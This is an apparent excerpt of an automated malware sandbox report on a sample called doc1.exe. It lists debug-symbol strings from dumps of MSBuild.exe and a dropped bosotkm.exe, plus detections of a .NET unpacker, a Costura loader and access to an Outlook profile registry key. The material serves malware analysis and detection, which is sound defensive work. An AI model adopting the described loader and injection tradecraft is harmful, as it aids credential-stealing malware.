                  Source: C:\Users\user\Desktop\doc1.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: doc1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: doc1.exeStatic file information: File size 1118840 > 1048576
                  Source: doc1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDBJ source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb|) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbS source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: doc1.exe, 00000001.00000002.2304053557.0000000005770000.00000004.08000000.00040000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.0000000004269000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.00000000041FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb\dp`d source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb= source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbYQ source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2458450033.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2562731419.000000000154D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbs source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb((^ source: MSBuild.exe, 00000016.00000002.2558663468.00000000014E2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb` source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb,) source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbf source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL} source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbL08w# source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: mscorlib.pdb7 source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdbH source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbV source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbw source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.pdbMSBuild.exe source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbS source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb6 source: WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb$ source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb! source: MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: ?pnC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb" source: MSBuild.exe, 00000023.00000002.2865138161.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb3 source: MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb!z source: MSBuild.exe, 00000023.00000002.2864210130.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbV source: MSBuild.exe, 00000029.00000002.3038113235.0000000001348000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdbS source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbl)B source: MSBuild.exe, 00000029.00000002.3038923676.00000000013E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdbxW source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb== source: MSBuild.exe, 0000000C.00000002.2457220076.0000000000F43000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbJ@2 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: osymbols\exe\MSBuild.pdb source: MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb4 source: WERC3B0.tmp.dmp.15.dr
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbsers\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:r source: MSBuild.exe, 00000029.00000002.3038923676.00000000013FF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.pdbH source: WER69E3.tmp.dmp.37.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbeh source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HPdn0C:\Windows\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB89 source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: @pn.pdb5w source: MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: doc1.exe, 00000001.00000002.2293545434.0000000002BB8000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, doc1.exe, 00000001.00000002.2304587014.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, doc1.exe, 00000001.00000002.2301644426.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2538896403.000000000417B000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 0000000B.00000002.2514918808.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, bosotkm.exe, 00000012.00000002.2615450393.00000000043AB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb~x+h5 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb089 source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdb.x source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: mscorlib.pdbL}f source: MSBuild.exe, 00000016.00000002.2558663468.00000000014CC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2864210130.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbH source: WER2A88.tmp.dmp.31.dr
                  Source: Binary string: System.Core.pdb`d source: WERABFD.tmp.dmp.43.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000023.00000002.2863825564.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: inaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbll source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdbt source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Drawing.pdbL08w# source: WERABFD.tmp.dmp.43.dr
                  Source: Binary string: \??\C:\Windows\exe\MSBuild.pdb;h source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E71000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2558663468.0000000001468000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3038113235.0000000001331000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\MSBuild.pdbB@* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @pn.pdb source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.2555966193.0000000000FD8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000001D.00000002.2700081075.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 00000029.00000002.3036386294.0000000000F58000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbn source: MSBuild.exe, 00000023.00000002.2864210130.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb*p source: MSBuild.exe, 00000016.00000002.2558663468.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb0q source: MSBuild.exe, 0000000C.00000002.2456725368.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbhWH source: WERF2AF.tmp.dmp.24.dr
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb* source: MSBuild.exe, 0000000C.00000002.2456837867.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbd5 source: MSBuild.exe, 0000001D.00000002.2700280840.0000000000808000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERABFD.tmp.dmp.43.dr, WERC3B0.tmp.dmp.15.dr, WERF2AF.tmp.dmp.24.dr, WER2A88.tmp.dmp.31.dr, WER69E3.tmp.dmp.37.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: doc1.exe, Uofmwwt.cs.Net Code: Epzyany System.AppDomain.Load(byte[])
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3acd5b0.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                  Source: 1.2.doc1.exe.3a7d590.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                  Source: 1.2.doc1.exe.3b1bdd0.3.raw.unpack, Uofmwwt.cs.Net Code: Epzyany System.AppDomain.Load(byte[])
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 1.2.doc1.exe.56f0000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2293545434.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2303816567.00000000056F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.2593909614.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2514918808.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: doc1.exe PID: 6400, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1864, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bosotkm.exe PID: 1292, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_01066330 push esp; retf 1_2_01066331
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_057E5A54 push es; retf 1_2_057E5A57
                  Source: C:\Users\user\Desktop\doc1.exeCode function: 1_2_0580327C push ebx; iretd 1_2_0580327F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00DD24B9 push 8BFFFFFFh; retf 4_2_00DD24BF
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367F7 pushad ; iretd 11_2_016367F9
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367D8 pushad ; iretd 11_2_016367DA
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016367BA pushad ; iretd 11_2_016367BB
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01636833 pushad ; iretd 11_2_01636834
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01636814 pushad ; iretd 11_2_01636815
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637165 push esi; iretd 11_2_01637166
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637142 push esi; iretd 11_2_01637144
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637124 push edi; iretd 11_2_01637125
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_01637105 push edi; iretd 11_2_01637106
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exeCode function: 11_2_016371EC push esi; iretd 11_2_016371EE
